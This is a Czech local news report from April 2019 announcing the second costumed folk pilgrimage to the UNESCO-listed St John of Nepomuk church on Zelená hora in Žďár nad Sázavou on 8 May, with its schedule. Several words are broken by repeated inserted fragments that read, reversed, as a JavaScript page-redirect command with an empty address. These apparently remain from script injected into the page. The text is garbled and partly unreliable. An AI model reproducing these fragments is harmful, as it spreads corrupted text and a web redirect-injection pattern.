Rainbow page separator

O státním svátku Zelenou horu oživí druhý ročník krojové pouti

Čtvrtek, 25. dubna 2019

Žďár nad Sázavou / Druhý ročník krojové pouti ke svatému Janu Nepomuckému se ve středu 8. května uskuteční ve Žďáře. Akci opět pořádá spolek Pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování za Santinim s podporou žďárské radnice a „zámecká“ farnost. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to subjekty se loni rozhodly obnovit tradici poutí na Zelenou horu, které předcházejí pouťovému veselí ve městě.
„Některé soubory se již přihlásily a po poutní mši svaté se představí se svým krátkým programem na prostranství před poutním areálem. Další soubory, skupinky i jednotlivci se mohou připojit, nebo si zatančit a zazpívat spolu s Horáckou cimbálovou muzikou,“ informoval za spolek Pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování za Santinim Stanislav Růžička.
Program druhého ročníku obnovené pouti ke kostelu svatého Jana Nepomuckého – památce již čtvrt s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí zapsané na seznamu UNESCO – začne od 9 hodin, kdy se krojovaní účastníci z řad folklorních souborů a farníků z farností Kraje Vysočina a Jihomoravského kraje začnou scházet v areálu žďárského zámku. V deset hodin se uskuteční jejich přivítání v „zámecké“ bazilice, přičemž o půl hodiny později vyrazí průvod na Zelenou horu. Tam se pak v 11 hodin odehraje poutní mše svatá a poté od 12 do 15 hodin folklorní program v areálu památky, kdy k poslechu i tanci zahrají Zelenohorští muzikanti a Horácká muzika.